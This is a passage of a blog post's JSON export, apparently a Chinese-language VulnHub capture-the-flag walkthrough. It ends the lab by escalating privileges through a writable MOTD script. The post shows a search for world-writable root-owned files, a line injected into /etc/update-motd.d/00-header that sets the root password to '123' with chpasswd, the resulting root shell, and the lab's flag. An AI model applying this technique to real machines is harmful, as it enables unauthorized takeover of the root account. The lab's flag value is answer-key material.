d9\u4e2a\u8d26\u53f7\u4e0a\u7684\u65f6\u5019\uff0c\u6211\u4eec\u8fd9\u4e9bmotd\u7684sh\u811a\u672c\u5c31\u4f1a\u88ab\u4ee5root\u7528\u6237\u7684\u6743\u9650\u6267\u884c\uff0c\u8fd9\u65f6\u5019\u6211\u4eec\u5199\u5165\u7684\u4fee\u6539root\u7528\u6237\u5bc6\u7801\u7684\u547d\u4ee4\u4e5f\u4f1a\u88ab\u6267\u884c\uff0c\u4e4b\u540e\u6211\u4eec\u53ea\u9700\u8981\u5207\u6362\u5230root\u7528\u6237\u5373\u53ef\u5b8c\u6210\u63d0\u6743\uff0c\u601d\u8def\u6709\u4e86\u4e0b\u9762\u5f00\u59cb\u64cd\u4f5c\u3002<\/p>\n\n\n\n<p>find \/ -type f -user root -perm -ug=x,o=w -exec ls -l &#8216;{}&#8217; ; 2&gt;\/dev\/null<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4fee\u6539root\u5bc6\u7801<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>vi \/etc\/update-motd.d\/00-header      #\u7f16\u8f91\u8fd9\u4e2a\u6587\u4ef6\necho 'root:123' | chpasswd        #\u5728\u6587\u4ef6\u672b\u5c3e\u6dfb\u52a0\u8fd9\u4e00\u884c\uff0c\u8fd9\u884c\u7684\u610f\u601d\u5c31\u662f\uff0c\u4f7f\u7528chpasswd\u547d\u4ee4\u5c06root\u7528\u6237\u7684\u5bc6\u7801\u4fee\u6539\u4e3a123\n\n#\u5728\u6587\u4ef6\u672b\u5c3e\u6dfb\u52a0\u8fd9\u4e00\u884c\uff0c\u8fd9\u884c\u7684\u610f\u601d\u5c31\u662f\uff0c\u4f7f\u7528chpasswd\u547d\u4ee4\u5c06root\u7528\u6237\u7684\u5bc6\u7801\u4fee\u6539\u4e3a123\n\u6309 G \u8df3\u8f6c\u5230\u6587\u4ef6\u6700\u540e\u4e00\u884c\u3002\n\u6309 o\u5728\u4e0b\u4e00\u884c\u8fdb\u5165\u63d2\u5165\u6a21\u5f0f(\u6216\u6309 A \u5728\u5f53\u524d\u884c\u672b\u5c3e\u8fdb\u5165\u63d2\u5165\u6a21\u5f0f)\u3002\n\u8f93\u5165\u8981\u6dfb\u52a0\u7684\u5185\u5bb9\u3002\n\u6309 ESC \u8fd4\u56de\u547d\u4ee4\u6a21\u5f0f\uff0c\u8f93\u5165:wq \u4fdd\u5b58\u5e76\u9000\u51fa\u3002<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-218.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"847\" height=\"757\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-218.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-505\"  sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><\/div><\/figure>\n\n\n\n<p>\u91cd\u65b0\u52a0\u8f7d<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-219.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"336\" height=\"71\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-506\"  sizes=\"auto, (max-width: 336px) 100vw, 336px\" \/><\/div><\/figure>\n\n\n\n<p>\u8f93\u5165\u5bc6\u7801123 \u5c31\u884c<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u63d0\u6743:<\/strong><\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-220-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-220-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-507\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>inferno@ubuntu:~$ su root\nPassword: \nroot@ubuntu:\/home\/inferno# cd ~\nroot@ubuntu:~# ls\nroot.txt\nroot@ubuntu:~# cat root.txt\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2591\u2591\u2588\n\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2588\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2591\u2591\u2588\n\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2591\u2591\u2584\u2580\u2591\u2591\u2588\u2588\u2591\u2591\u2584\u2580\u2584\u2580\u2591\u2591\u2588\n\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nRoot Flag: {9440aee508b6215995219c58c8ba4b45}\n\n!! Congrats you have finished this task !!\n\nContact us here:\n\nHacking Articles : https:\/\/twitter.com\/hackinarticles\n\nJeenali Kothari  : https:\/\/www.linkedin.com\/in\/jeenali-kothari\/\n\n+-+-+-+-+-+ +-+-+-+-+-+-+-+\n |E|n|j|o|y| |H|A|C|K|I|N|G|\n +-+-+-+-+-+ +-+-+-+-+-+-+-+\n__________________________________\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5f97\u5230flag2\uff1a<\/h2>\n\n\n\n<p>Flag: {9440aee508b6215995219c58c8ba4b45}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>arp-scan -l \u5148\u626b\u63cf\u9776\u673a\u5730\u5740\u4e3a\u591a\u5c11 \u770b\u5230\u5730\u5740\u4e3a192.168.11.136 \u7136\u540e\u5f00\u59cb\u4f7f\u7528nmap\u8fdb\u884c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,9],"tags":[],"class_list":["post-482","post","type-post","status-publish","format-standard","hentry","category-vulnhub","category-wp"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/482","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=482"}],"version-history":[{"count":1,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/482\/revisions"}],"predecessor-version":[{"id":508,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/482\/revisions\/508"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=482"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=482"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}